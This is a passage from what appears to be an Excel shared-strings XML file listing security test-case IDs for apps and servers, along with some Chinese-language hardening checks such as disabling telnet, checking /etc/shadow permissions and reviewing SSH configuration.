    <t>APK_SECR_010105_013</t>
  </si>
  <si>
    <t>APK_SECR_010105_014</t>
  </si>
  <si>
    <t>APK_SECR_010105_015</t>
  </si>
  <si>
    <t>APK_SECR_01010601_001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>APK_SECR_01010601_002</t>
  </si>
  <si>
    <t>APK_SECR_01010601_003</t>
  </si>
  <si>
    <t>APK_SECR_01010601_004</t>
  </si>
  <si>
    <t>APK_SECR_01010601_005</t>
  </si>
  <si>
    <t>APK_SECR_01010601_006</t>
  </si>
  <si>
    <t>APK_SECR_01010601_007</t>
  </si>
  <si>
    <t>APK_SECR_01010601_008</t>
  </si>
  <si>
    <t>APK_SECR_01010601_009</t>
  </si>
  <si>
    <t>APK_SECR_01010602_001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>APK_SECR_01010602_002</t>
  </si>
  <si>
    <t>APK_SECR_01010602_003</t>
  </si>
  <si>
    <t>APK_SECR_01010602_004</t>
  </si>
  <si>
    <t>APK_SECR_01010602_005</t>
  </si>
  <si>
    <t>APK_SECR_01010602_006</t>
  </si>
  <si>
    <t>APK_SECR_01010602_007</t>
  </si>
  <si>
    <t>APK_SECR_01010602_008</t>
  </si>
  <si>
    <t>APK_SECR_01010602_009</t>
  </si>
  <si>
    <t>APK_SECR_01010602_010</t>
  </si>
  <si>
    <t>APK_SECR_01010602_011</t>
  </si>
  <si>
    <t>APK_SECR_01010602_012</t>
  </si>
  <si>
    <t>APK_SECR_01010602_013</t>
  </si>
  <si>
    <t>APK_SECR_01010602_014</t>
  </si>
  <si>
    <t>APK_SECR_01010602_015</t>
  </si>
  <si>
    <t>APK_SECR_01010602_016</t>
  </si>
  <si>
    <t>APK_SECR_01010603_001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>APK_SECR_01010603_002</t>
  </si>
  <si>
    <t>APK_SECR_01010603_003</t>
  </si>
  <si>
    <t>APK_SECR_01010603_004</t>
  </si>
  <si>
    <t>APK_SECR_01010603_005</t>
  </si>
  <si>
    <t>APK_SECR_01010603_006</t>
  </si>
  <si>
    <t>APK_SECR_01010603_007</t>
  </si>
  <si>
    <t>APK_SECR_01010603_008</t>
  </si>
  <si>
    <t>APK_SECR_01010603_009</t>
  </si>
  <si>
    <t>APK_SECR_01010603_010</t>
  </si>
  <si>
    <t>APK_SECR_01010603_011</t>
  </si>
  <si>
    <t>APK_SECR_01010603_012</t>
  </si>
  <si>
    <t>APK_SECR_01010603_013</t>
  </si>
  <si>
    <t>APK_SECR_01010603_014</t>
  </si>
  <si>
    <t>APK_SECR_01010603_015</t>
  </si>
  <si>
    <t>APK_SECR_01010603_016</t>
  </si>
  <si>
    <t>APK_SECR_01010603_017</t>
  </si>
  <si>
    <t>APK_SECR_01010603_018</t>
  </si>
  <si>
    <t>APK_SECR_01010603_019</t>
  </si>
  <si>
    <t>APK_SECR_01010603_020</t>
  </si>
  <si>
    <t>APK_SECR_01010603_021</t>
  </si>
  <si>
    <t>APK_SECR_01010603_022</t>
  </si>
  <si>
    <t>APK_SECR_010110_001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>APK_SECR_010110_002</t>
  </si>
  <si>
    <t>APK_SECR_010110_003</t>
  </si>
  <si>
    <t>APK_SECR_010110_004</t>
  </si>
  <si>
    <t>APK_SECR_010110_005</t>
  </si>
  <si>
    <t>APK_SECR_010112_005</t>
  </si>
  <si>
    <t>APK_SECR_010112_001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>APK_SECR_010112_002</t>
  </si>
  <si>
    <t>APK_SECR_010112_003</t>
  </si>
  <si>
    <t>APK_SECR_010112_004</t>
  </si>
  <si>
    <t>APK_SECR_010112_006</t>
  </si>
  <si>
    <t>APK_SECR_010112_007</t>
  </si>
  <si>
    <t>APK_SECR_010112_008</t>
  </si>
  <si>
    <t>APK_SECR_010112_009</t>
  </si>
  <si>
    <t>APK_SECR_010112_010</t>
  </si>
  <si>
    <t>APK_SECR_010112_011</t>
  </si>
  <si>
    <t>APK_SECR_010112_012</t>
  </si>
  <si>
    <t>APK_SECR_010112_013</t>
  </si>
  <si>
    <t>APK_SECR_010112_014</t>
  </si>
  <si>
    <t>APK_SECR_010112_015</t>
  </si>
  <si>
    <t>APK_SECR_010112_016</t>
  </si>
  <si>
    <t>APK_SECR_010112_017</t>
  </si>
  <si>
    <t>APK_SECR_010112_018</t>
  </si>
  <si>
    <t>APK_SECR_010112_019</t>
  </si>
  <si>
    <t>APK_SECR_010112_020</t>
  </si>
  <si>
    <t>APK_SECR_010112_021</t>
  </si>
  <si>
    <t>APK_SECR_010112_022</t>
  </si>
  <si>
    <t>APK_SECR_010112_023</t>
  </si>
  <si>
    <t>APK_SECR_010112_024</t>
  </si>
  <si>
    <t>APK_SECR_010112_025</t>
  </si>
  <si>
    <t>APK_SECR_010112_026</t>
  </si>
  <si>
    <t>APK_SECR_010112_027</t>
  </si>
  <si>
    <t>APK_SECR_010112_028</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>APK_MOI_010201_001</t>
  </si>
  <si>
    <t>APK_MOI_010201_002</t>
  </si>
  <si>
    <t>APK_MOI_010201_003</t>
  </si>
  <si>
    <t>APK_MOI_010201_004</t>
  </si>
  <si>
    <t>APK_MOI_010201_005</t>
  </si>
  <si>
    <t>APK_MOI_010201_006</t>
  </si>
  <si>
    <t>APK_MOI_010201_007</t>
  </si>
  <si>
    <t>APK_MOI_010201_008</t>
  </si>
  <si>
    <t>APK_MOI_010201_009</t>
  </si>
  <si>
    <t>APK_MOI_010201_010</t>
  </si>
  <si>
    <t>APK_MOI_010201_011</t>
  </si>
  <si>
    <t>APK_MOI_010201_012</t>
  </si>
  <si>
    <t>APK_MOI_010201_013</t>
  </si>
  <si>
    <t>APK_MOI_010201_014</t>
  </si>
  <si>
    <t>APK_MOI_010202_014</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>APK_MOI_010202_015</t>
  </si>
  <si>
    <t>APK_MOI_010202_016</t>
  </si>
  <si>
    <t>APK_MOI_010202_017</t>
  </si>
  <si>
    <t>APK_MOI_010202_018</t>
  </si>
  <si>
    <t>APK_MOI_010202_019</t>
  </si>
  <si>
    <t>APK_MOI_010202_020</t>
  </si>
  <si>
    <t>APK_MOI_010202_021</t>
  </si>
  <si>
    <t>APK_MOI_010202_022</t>
  </si>
  <si>
    <t>APK_MOI_010202_023</t>
  </si>
  <si>
    <t>APK_MOI_010202_024</t>
  </si>
  <si>
    <t>APK_MOI_010202_025</t>
  </si>
  <si>
    <t>APK_MOI_010202_026</t>
  </si>
  <si>
    <t>APK_MOI_010202_027</t>
  </si>
  <si>
    <t>APK_MOI_010202_028</t>
  </si>
  <si>
    <t>APK_MOI_010202_029</t>
  </si>
  <si>
    <t>APK_MOI_010202_030</t>
  </si>
  <si>
    <t>APK_MOI_010202_031</t>
  </si>
  <si>
    <t>APK_MOI_010202_032</t>
  </si>
  <si>
    <t>APK_MOI_010202_033</t>
  </si>
  <si>
    <t>APK_MOI_010202_034</t>
  </si>
  <si>
    <t>APK_MOI_010202_035</t>
  </si>
  <si>
    <t>APK_SECNR_010301_001</t>
  </si>
  <si>
    <t>APK_SECNR_010301_002</t>
  </si>
  <si>
    <t>APK_SECNR_010301_003</t>
  </si>
  <si>
    <t>APK_SECNR_010301_004</t>
  </si>
  <si>
    <t>APK_SECNR_010301_005</t>
  </si>
  <si>
    <t>APK_SECNR_010301_006</t>
  </si>
  <si>
    <t>APK_SECNR_010301_007</t>
  </si>
  <si>
    <t>APK_SECNR_010301_008</t>
  </si>
  <si>
    <t>APK_SECNR_010301_009</t>
  </si>
  <si>
    <t>APK_SECNR_010301_010</t>
  </si>
  <si>
    <t>APK_SECNR_010302_001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>APK_SECNR_010303_001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>APK_SECNR_010303_002</t>
  </si>
  <si>
    <t>APK_SECNR_010303_003</t>
  </si>
  <si>
    <t>APK_SECNR_010303_004</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>SER_SECR_020103_001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>SER_SECR_020103_002</t>
  </si>
  <si>
    <t>SER_SECR_020103_003</t>
  </si>
  <si>
    <t>SER_SECR_020103_004</t>
  </si>
  <si>
    <t>SER_SECR_020103_006</t>
  </si>
  <si>
    <t>SER_SECR_020103_007</t>
  </si>
  <si>
    <t>SER_SECR_020103_008</t>
  </si>
  <si>
    <t>SER_SECR_020103_009</t>
  </si>
  <si>
    <t>SER_SECR_020103_010</t>
  </si>
  <si>
    <t>SER_SECR_020103_011</t>
  </si>
  <si>
    <t>SER_SECR_020104_001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>SER_SECR_020104_002</t>
  </si>
  <si>
    <t>SER_SECR_020104_003</t>
  </si>
  <si>
    <t>SER_SECR_020104_004</t>
  </si>
  <si>
    <t>SER_SECR_020104_005</t>
  </si>
  <si>
    <t>SER_SECR_020104_006</t>
  </si>
  <si>
    <t>SER_SECR_020104_007</t>
  </si>
  <si>
    <t>SER_SECR_020104_008</t>
  </si>
  <si>
    <t>SER_SECR_020104_009</t>
  </si>
  <si>
    <t>SER_SECR_020104_010</t>
  </si>
  <si>
    <t>SER_SECR_020104_011</t>
  </si>
  <si>
    <t>SER_SECR_020104_012</t>
  </si>
  <si>
    <t>SER_SECR_020104_013</t>
  </si>
  <si>
    <t>SER_SECR_020104_014</t>
  </si>
  <si>
    <t>SER_SECR_020104_015</t>
  </si>
  <si>
    <t>012 授权和用户角色数据存放在服务器端</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>013 管理功能和业务功能相互独立部署</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>014 通信矩阵</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>015 通信端口须在通信矩阵中说明</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>001 软件包病毒扫描</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>SER_SECR_020105_001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>SER_SECR_020105_002</t>
  </si>
  <si>
    <t>SER_SECR_020105_003</t>
  </si>
  <si>
    <t>SER_SECR_02010601_001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>SER_SECR_02010601_002</t>
  </si>
  <si>
    <t>SER_SECR_02010601_003</t>
  </si>
  <si>
    <t>SER_SECR_02010601_005</t>
  </si>
  <si>
    <t>SER_SECR_02010601_006</t>
  </si>
  <si>
    <t>SER_SECR_02010601_007</t>
  </si>
  <si>
    <t>SER_SECR_02010601_008</t>
  </si>
  <si>
    <t>SER_SECR_02010601_009</t>
  </si>
  <si>
    <t>SER_SECR_02010601_010</t>
  </si>
  <si>
    <t>SER_SECR_02010601_011</t>
  </si>
  <si>
    <t>SER_SECR_02010601_012</t>
  </si>
  <si>
    <t>SER_SECR_02010601_014</t>
  </si>
  <si>
    <t>SER_SECR_02010601_015</t>
  </si>
  <si>
    <t>SER_SECR_02010601_016</t>
  </si>
  <si>
    <t>SER_SECR_02010601_017</t>
  </si>
  <si>
    <t>SER_SECR_02010601_018</t>
  </si>
  <si>
    <t>SER_SECR_02010602_001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>SER_SECR_02010602_002</t>
  </si>
  <si>
    <t>SER_SECR_02010602_003</t>
  </si>
  <si>
    <t>SER_SECR_02010602_004</t>
  </si>
  <si>
    <t>SER_SECR_02010602_005</t>
  </si>
  <si>
    <t>SER_SECR_02010602_006</t>
  </si>
  <si>
    <t>SER_SECR_02010602_007</t>
  </si>
  <si>
    <t>SER_SECR_02010602_008</t>
  </si>
  <si>
    <t>SER_SECR_02010602_009</t>
  </si>
  <si>
    <t>SER_SECR_02010602_010</t>
  </si>
  <si>
    <t>SER_SECR_02010602_011</t>
  </si>
  <si>
    <t>SER_SECR_02010602_012</t>
  </si>
  <si>
    <t>SER_SECR_02010602_013</t>
  </si>
  <si>
    <t>SER_SECR_02010602_014</t>
  </si>
  <si>
    <t>SER_SECR_02010602_015</t>
  </si>
  <si>
    <t>SER_SECR_02010602_016</t>
  </si>
  <si>
    <t>015 证书及密钥对可替换</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>016 证书私钥的加密存储</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>01.禁止使用私有加密算法</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>SER_SECR_02010603_001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>SER_SECR_02010603_002</t>
  </si>
  <si>
    <t>SER_SECR_02010603_003</t>
  </si>
  <si>
    <t>SER_SECR_02010603_004</t>
  </si>
  <si>
    <t>SER_SECR_02010603_005</t>
  </si>
  <si>
    <t>SER_SECR_02010603_006</t>
  </si>
  <si>
    <t>SER_SECR_02010603_007</t>
  </si>
  <si>
    <t>SER_SECR_02010603_008</t>
  </si>
  <si>
    <t>SER_SECR_02010603_009</t>
  </si>
  <si>
    <t>SER_SECR_02010603_010</t>
  </si>
  <si>
    <t>SER_SECR_02010603_011</t>
  </si>
  <si>
    <t>SER_SECR_02010603_012</t>
  </si>
  <si>
    <t>SER_SECR_02010603_013</t>
  </si>
  <si>
    <t>SER_SECR_02010603_014</t>
  </si>
  <si>
    <t>SER_SECR_02010603_015</t>
  </si>
  <si>
    <t>SER_SECR_02010603_016</t>
  </si>
  <si>
    <t>SER_SECR_02010603_017</t>
  </si>
  <si>
    <t>SER_SECR_02010603_018</t>
  </si>
  <si>
    <t>SER_SECR_02010603_019</t>
  </si>
  <si>
    <t>SER_SECR_02010603_020</t>
  </si>
  <si>
    <t>SER_SECR_02010603_021</t>
  </si>
  <si>
    <t>SER_SECR_02010603_022</t>
  </si>
  <si>
    <t>SER_SECR_020107_001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>SER_SECR_020107_002</t>
  </si>
  <si>
    <t>SER_SECR_020107_003</t>
  </si>
  <si>
    <t>SER_SECR_020107_004</t>
  </si>
  <si>
    <t>SER_SECR_020107_005</t>
  </si>
  <si>
    <t>SER_SECR_020107_006</t>
  </si>
  <si>
    <t>SER_SECR_020107_007</t>
  </si>
  <si>
    <t>SER_SECR_020107_008</t>
  </si>
  <si>
    <t>SER_SECR_020108_001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>SER_SECR_020108_002</t>
  </si>
  <si>
    <t>SER_SECR_020108_003</t>
  </si>
  <si>
    <t>SER_SECR_020108_004</t>
  </si>
  <si>
    <t>SER_SECR_020108_005</t>
  </si>
  <si>
    <t>SER_SECR_020108_006</t>
  </si>
  <si>
    <t>SER_SECR_020108_007</t>
  </si>
  <si>
    <t>SER_SECR_020108_008</t>
  </si>
  <si>
    <t>SER_SECR_020108_009</t>
  </si>
  <si>
    <t>SER_SECR_020108_010</t>
  </si>
  <si>
    <t>SER_SECR_020108_011</t>
  </si>
  <si>
    <t>SER_SECR_020108_012</t>
  </si>
  <si>
    <t>SER_SECR_020108_013</t>
  </si>
  <si>
    <t>SER_SECR_020108_014</t>
  </si>
  <si>
    <t>SER_SECR_020108_015</t>
  </si>
  <si>
    <t>SER_SECR_020108_016</t>
  </si>
  <si>
    <t>SER_SECR_020108_017</t>
  </si>
  <si>
    <t>SER_SECR_020108_018</t>
  </si>
  <si>
    <t>SER_SECR_020108_019</t>
  </si>
  <si>
    <t>SER_SECR_020108_020</t>
  </si>
  <si>
    <t>SER_SECR_020108_021</t>
  </si>
  <si>
    <t>SER_SECR_020108_022</t>
  </si>
  <si>
    <t>SER_SECR_020108_023</t>
  </si>
  <si>
    <t>SER_SECR_020108_024</t>
  </si>
  <si>
    <t>SER_SECR_020108_025</t>
  </si>
  <si>
    <t>SER_SECR_020108_026</t>
  </si>
  <si>
    <t>SER_SECR_020108_027</t>
  </si>
  <si>
    <t>SER_SECR_020108_028</t>
  </si>
  <si>
    <t>SER_SECR_020108_029</t>
  </si>
  <si>
    <t>SER_SECR_020108_030</t>
  </si>
  <si>
    <t>SER_SECR_020108_031</t>
  </si>
  <si>
    <t>SER_SECR_020108_032</t>
  </si>
  <si>
    <t>SER_SECR_020108_033</t>
  </si>
  <si>
    <t>SER_SECR_020108_034</t>
  </si>
  <si>
    <t>SER_SECR_020108_035</t>
  </si>
  <si>
    <t>SER_SECR_020108_036</t>
  </si>
  <si>
    <t>SER_SECR_020108_037</t>
  </si>
  <si>
    <t>SER_SECR_020108_038</t>
  </si>
  <si>
    <t>SER_SECR_020108_039</t>
  </si>
  <si>
    <t>SER_SECR_020108_040</t>
  </si>
  <si>
    <t>SER_SECR_020108_041</t>
  </si>
  <si>
    <t>SER_SECR_020108_042</t>
  </si>
  <si>
    <t>SER_SECR_020108_043</t>
  </si>
  <si>
    <t>SER_SECR_020108_044</t>
  </si>
  <si>
    <t>SER_SECR_020108_045</t>
  </si>
  <si>
    <t>SER_SECR_020108_046</t>
  </si>
  <si>
    <t>005 检查系统是否存在无线接口，若存在且非必须应deactivate</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>006 检查所有接口的IPv4地址和IPv6地址是否静态配置</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>007 验证系统没有启用不安全的系统服务：rsh服务端、rsh客户端、telnet服务器</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>008 验证系统仅在绝对必要时启用Telnet服务</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>009 验证系统仅在绝对必要时启用TFTP服务器</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>010 验证/etc/passwd、/etc/shadow、/etc/group三个文件的权限以及用户、用户组属性正确</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>011 确认系统中不包含无主的文件和目录，避免新用户因此获取超过系统设定的权限</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>012 确认系统中不包含无组的文件和目录，避免新用户因此获取超过系统设定的权限</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>013 验证密码字段不为空</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>014 确认用户 rhosts文件存在的合理性，避免用户即可不提供口令直接访问系统</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>015 确认系统中不包含未经授权的SUID/SGID系统可执行文件</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>016 确认系统中不包含无主文件，以表明系统无入侵者并且不存在不恰当的软件包维护或安装</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>017 SSH的配置检查</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>018 pam cracklib检查密码强度</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>019 登录失败锁定检查</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>020 su命令限制访问的检查</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>021 对通过SSH登陆系统的用户/组进行限制</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>022 限制root账户登陆到系统控制台</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>023 防止X服务器监听tcp 6000端口，避免非法访问本地X服务器的攻击者轻而易举的危害系统</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>024 检查LILO/GRUB密码的设置</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>025 确认系统仅在仅在绝对必要时启用syslog来接收消息</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>SER_SECR_020109_001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>SER_SECR_020109_002</t>
  </si>
  <si>
    <t>SER_SECR_020109_003</t>
  </si>
  <si>
    <t>SER_SECR_020109_004</t>
  </si>
  <si>
    <t>SER_SECR_020109_005</t>
  </si>
  <si>
    <t>SER_SECR_020109_006</t>
  </si>
  <si>
    <t>SER_SECR_020109_007</t>
  </si>
  <si>
    <t>SER_SECR_020109_008</t>
  </si>
  <si>
    <t>SER_SECR_020109_009</t>
  </si>
  <si>
    <t>SER_SECR_020109_010</t>
  </si>
  <si>
    <t>SER_SECR_020109_011</t>
  </si>
  <si>
    <t>SER_SECR_020109_012</t>
  </si>
  <si>
    <t>SER_SECR_020109_013</t>
  </si>
  <si>
    <t>SER_SECR_020109_014</t>
  </si>
  <si>
    <t>SER_SECR_020109_015</t>
  </si>
  <si>
    <t>SER_SECR_020109_016</t>
  </si>
  <si>
    <t>SER_SECR_020109_017</t>
  </si>
  <si>
    <t>SER_SECR_020109_018</t>
  </si>
  <si>
    <t>SER_SECR_020109_019</t>
  </si>
  <si>
    <t>SER_SECR_020109_020</t>
  </si>
  <si>
    <t>SER_SECR_020109_021</t>
  </si>
  <si>
    <t>SER_SECR_020109_022</t>
  </si>
  <si>
    <t>SER_SECR_020109_023</t>
  </si>
  <si>
    <t>SER_SECR_020109_024</t>
  </si>
  <si>
    <t>SER_SECR_020109_025</t>
  </si>
  <si>
    <t>SER_SECR_020109_026</t>
  </si>
  <si>
    <t>SER_SECR_020109_027</t>
  </si>
  <si>
    <t>SER_SECR_020109_028</t>
  </si>
  <si>
    <t>SER_SECR_020109_029</t>
  </si>
  <si>
    <t>SER_SECR_020109_030</t>
  </si>
  <si>
    <t>SER_SECR_020109_031</t>
  </si>
  <si>
    <t>SER_SECR_020109_032</t>
  </si>
  <si>
    <t>SER_SECR_020109_033</t>
  </si>
  <si>
    <t>SER_SECR_020109_034</t>
  </si>
  <si>
    <t>SER_SECR_020109_035</t>
  </si>
  <si>
    <t>SER_SECR_020109_036</t>
  </si>
  <si>
    <t>SER_SECR_020109_037</t>
  </si>
  <si>
    <t>SER_SECR_020109_038</t>
  </si>
  <si>
    <t>SER_SECR_020109_039</t>
  </si>
  <si>
    <t>SER_SECR_020109_040</t>
  </si>
  <si>
    <t>SER_SECR_020109_041</t>
  </si>
  <si>
    <t>SER_SECR_020109_042</t>
  </si>
  <si>
    <t>SER_SECR_020109_043</t>
  </si>
  <si>
    <t>SER_SECR_020109_044</t>
  </si>
  <si>
    <t>SER_SECR_020109_045</t>
  </si>
  <si>
    <t>SER_SECR_020109_046</t>
  </si>
  <si>
    <t>SER_SECR_020109_047</t>
  </si>
  <si>
    <t>SER_SECR_020109_048</t>
  </si>
  <si>
    <t>SER_SECR_020109_049</t>
  </si>
  <si>
    <t>SER_SECR_020109_050</t>
  </si>
  <si>
    <t>SER_SECR_020109_051</t>
  </si>
  <si>
    <t>SER_SECR_020109_052</t>
  </si>
  <si>
    <t>SER_SECR_020109_053</t>
  </si>
  <si>
    <t>SER_SECR_020109_054</t>
  </si>
  <si>
    <t>SER_SECR_020109_055</t>
  </si>
  <si>
    <t>SER_SECR_020109_056</t>
  </si>
  <si>
    <t>SER_SECR_020109_057</t>
  </si>
  <si>
    <t>SER_SECR_020109_058</t>
  </si>
  <si>
    <t>SER_SECR_020109_059</t>
  </si>
  <si>
    <t>SER_SECR_020109_060</t>
  </si>
  <si>
    <t>SER_SECR_020109_061</t>
  </si>
  <si>
    <t>SER_SECR_020109_062</t>
  </si>
  <si>
    <t>SER_SECR_020109_063</t>
  </si>
  <si>
    <t>SER_SECR_020109_064</t>
  </si>
  <si>
    <t>SER_SECR_020109_065</t>
  </si>
  <si>
    <t>SER_SECR_020109_066</t>
  </si>
  <si>
    <t>SER_SECR_020109_067</t>
  </si>
  <si>
    <t>SER_SECR_020109_068</t>
  </si>
  <si>
    <t>SER_SECR_020109_069</t>
  </si>
  <si>
    <t>SER_SECR_020109_070</t>
  </si>
  <si>
    <t>SER_SECR_020109_071</t>
  </si>
  <si>
    <t>SER_SECR_020109_072</t>
  </si>
  <si>
    <t>SER_SECR_020109_073</t>
  </si>
  <si>
    <t>SER_SECR_020109_074</t>
  </si>
  <si>
    <t>SER_SECR_020109_075</t>
  </si>
  <si>
    <t>SER_SECR_020109_076</t>
  </si>
  <si>
    <t>SER_SECR_020109_077</t>
  </si>
  <si>
    <t>SER_SECR_020109_078</t>
  </si>
  <si>
    <t>SER_SECR_020109_079</t>
  </si>
  <si>
    <t>SER_SECR_020109_080</t>
  </si>
  <si>
    <t>SER_SECR_020109_081</t>
  </si>
  <si>
    <t>SER_SECR_020109_082</t>
  </si>
  <si>
    <t>SER_SECR_020109_083</t>
  </si>
  <si>
    <t>SER_SECR_020109_084</t>
  </si>
  <si>
    <t>SER_SECR_020109_085</t>
  </si>
  <si>
    <t>SER_SECR_020109_086</t>
  </si>
  <si>
    <t>SER_SECR_020109_087</t>
  </si>
  <si>
    <t>SER_SECR_020109_088</t>
  </si>
  <si>
    <t>SER_SECR_020109_090</t>
  </si>
  <si>
    <t>SER_SECR_020109_091</t>
  </si>
  <si>
    <t>SER_SECR_020109_092</t>
  </si>
  <si>
    <t>SER_SECR_020109_093</t>
  </si>
  <si>
    <t>SER_SECR_020109_094</t>
  </si>
  <si>
    <t>SER_SECR_020109_095</t>
  </si>
  <si>
    <t>SER_SECR_020109_096</t>
  </si>
  <si>
    <t>SER_SECR_020109_097</t>
  </si>
  <si>
    <t>SER_SECR_020109_098</t>
  </si>
  <si>
    <t>SER_SECR_020109_099</t>
  </si>
  <si>
    <t>SER_SECR_020109_100</t>
  </si>
  <si>
    <t>SER_SECR_020109_101</t>
  </si>
  <si>
    <t>SER_SECR_020109_102</t>
  </si>
  <si>
    <t>SER_SECR_020109_103</t>
  </si>
  <si>
    <t>SER_SECR_020109_104</t>
  </si>
  <si>
    <t>SER_SECR_020109_105</t>
  </si>
  <si>
    <t>SER_SECR_020109_106</t>
  </si>
  <si>
    <t>SER_SECR_020109_107</t>
  </si>
  <si>
    <t>SER_SECR_020109_108</t>
  </si>
  <si>
    <t>SER_SECR_020109_109</t>
  </si>
  <si>
    <t>SER_SECR_020109_110</t>
  </si>
  <si>
    <t>SER_SECR_020109_111</t>
  </si>
  <si>
    <t>SER_SECR_020109_112</t>
  </si>
  <si>
    <t>SER_SECR_020109_113</t>
  </si>
  <si>
    <t>SER_SECR_020109_114</t>
  </si>
  <si>
    <t>SER_SECR_020109_115</t>
  </si>
  <si>
    <t>SER_SECR_020109_116</t>
  </si>
  <si>
    <t>SER_SECR_020109_117</t>
  </si>
  <si>
    <t>SER_SECR_020109_118</t>
  </si>
  <si>
    <t>SER_SECR_020109_119</t>
  </si>
  <si>
    <t>SER_SECR_020109_120</t>
  </si>
  <si>
    <t>SER_SECR_020109_121</t>
  </si>
  <si>
    <t>SER_SECR_020109_122</t>
  </si>
  <si>
    <t>SER_SECR_020109_123</t>
  </si>
  <si>
    <t>SER_SECR_020109_124</t>
  </si>
  <si>
    <t>SER_SECR_020109_125</t>
  </si>
  <si>
    <t>SER_SECR_020109_126</t>
  </si>
  <si>
    <t>SER_SECR_020109_127</t>
  </si>
  <si>
    <t>SER_SECR_020109_128</t>
  </si>
  <si>
    <t>SER_SECR_020109_129</t>
  </si>
  <si>
    <t>SER_SECR_020109_130</t>
  </si>
  <si>
    <t>SER_SECR_020109_131</t>
  </si>
  <si>
    <t>SER_SECR_020109_132</t>
  </si>
  <si>
    <t>SER_SECR_020109_133</t>
  </si>
  <si>
    <t>SER_SECR_020109_134</t>
  </si>
  <si>
    <t>SER_SECR_020109_135</t>
  </si>
  <si>
    <t>SER_SECR_020109_136</t>
  </si>
  <si>
    <t>SER_SECR_020109_137</t>
  </si>
  <si>
    <t>SER_SECR_020109_138</t>
  </si>
  <si>
    <t>SER_SECR_020109_139</t>
  </si>
  <si>
    <t>SER_SECR_020109_140</t>
  </si>
  <si>
    <t>SER_SECR_020109_141</t>
  </si>
  <si>
    <t>SER_SECR_020109_142</t>
  </si>
  <si>
    <t>SER_SECR_020109_143</t>
  </si>
  <si>
    <t>SER_SECR_020109_144</t>
  </si>
  <si>
    <t>SER_SECR_020109_145</t>
  </si>
  <si>
    <t>SER_SECR_020109_146</t>
  </si>
  <si>
    <t>SER_SECR_020109_147</t>
  </si>
  <si>
    <t>SER_SECR_020109_148</t>
  </si>
  <si>
    <t>SER_SECR_020109_149</t>
  </si>
  <si>
    <t>SER_SECR_020109_150</t>
  </si>
  <si>
    <t>SER_SECR_020109_151</t>
  </si>
  <si>
    <t>SER_SECR_020109_152</t>
  </si>
  <si>
    <t>SER_SECR_020109_153</t>
  </si>
  <si>
    <t>SER_SECR_020109_154</t>
  </si>
  <si>
    <t>SER_SECR_020109_155</t>
  </si>
  <si>
    <t>SER_SECR_020109_156</t>
  </si>
  <si>
    <t>SER_SECR_020109_157</t>
  </si>
  <si>
    <t>SER_SECR_020109_158</t>
  </si>
  <si>
    <t>SER_SECR_020109_159</t>
  </si>
  <si>
    <t>SER_SECR_020109_160</t>
  </si>
  <si>
    <t>SER_SECR_020109_161</t>
  </si>
  <si>
    <t>SER_SECR_020109_162</t>
  </si>
  <si>
    <t>SER_SECR_020109_163</t>
  </si>
  <si>
    <t>SER_SECR_020109_164</t>
